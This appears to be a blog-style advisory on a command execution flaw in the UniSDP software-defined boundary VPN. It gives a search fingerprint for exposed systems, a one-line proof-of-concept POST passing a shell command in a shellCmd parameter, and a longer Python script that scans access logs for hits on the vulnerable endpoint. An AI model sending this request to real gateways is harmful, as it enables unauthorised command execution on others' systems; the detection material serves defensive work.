UniSDP software-defined boundary system commonRetSt command execution vulnerability
Vulnerability Description
Liansoft Security UniSDP software-defined boundary system is a next-generation VPN based on zero trust. In the 2021.04.28 version of this system, there is a security vulnerability in a TunnelGateway interface. The vulnerability allows an attacker to send a specially crafted request to the server and execute remote commands.
Vulnerability Impact
UniSDP Software-defined Boundary System
Network surveying and mapping
title="UniSSOView"
Vulnerability Reproduction
Login page
Verification PoC
POST /TunnelGateway/commondRetStr
shellCmd=id
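Detection example
The request above gives defenders a log signature to hunt for. The script below is an added example, not part of the original post or the vendor's code: it scans web access logs for requests to the endpoint named in the PoC. The log format (NCSA combined, from a proxy in front of the gateway), the severity rule and the sample lines are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Endpoint path from the PoC request on this page, lowercased for comparison.
VULN_PATH = "/tunnelgateway/commondretstr"

# Assumption: NCSA "combined" access-log lines from a proxy in front of the gateway.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize_path(target):
    """Canonicalize a request target so differently written paths still match."""
    path = target.split("?", 1)[0]           # ignore the query string
    for _ in range(2):                       # undo single and double percent-encoding
        path = unquote(path)
    path = re.sub(r";[^/]*", "", path)       # drop ;name=value path parameters
    path = re.sub(r"/+", "/", path)          # collapse duplicate slashes
    return posixpath.normpath(path).lower()  # resolve ./ and ../, drop trailing slash

def find_hits(lines):
    """Return one record per logged request that targets the vulnerable endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or normalize_path(m["target"]) != VULN_PATH:
            continue
        status = int(m["status"])
        # Assumption: a 2xx reply to a POST means the request reached the
        # application; anything else is kept for review (probe or blocked).
        handled = m["method"] == "POST" and 200 <= status < 300
        hits.append({"src": m["src"], "ts": m["ts"], "method": m["method"],
                     "status": status, "severity": "high" if handled else "review"})
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [12/May/2021:10:01:22 +0000] "GET /login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/May/2021:10:02:03 +0000] "POST /TunnelGateway/commondRetStr HTTP/1.1" 200 64 "-" "-"',
    '203.0.113.9 - - [12/May/2021:10:02:09 +0000] "POST /TunnelGateway//commondRetStr?x=1 HTTP/1.1" 403 0 "-" "-"',
    '192.0.2.44 - - [12/May/2021:10:05:40 +0000] "GET /tunnelgateway/commondretstr/ HTTP/1.1" 404 0 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_hits(SAMPLE):
        print(hit)
```

Access logs rarely record POST bodies, so the match is on the path alone; the shellCmd parameter from the PoC is only visible where request bodies are captured.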
This post is licensed under CC BY 4.0 by the author.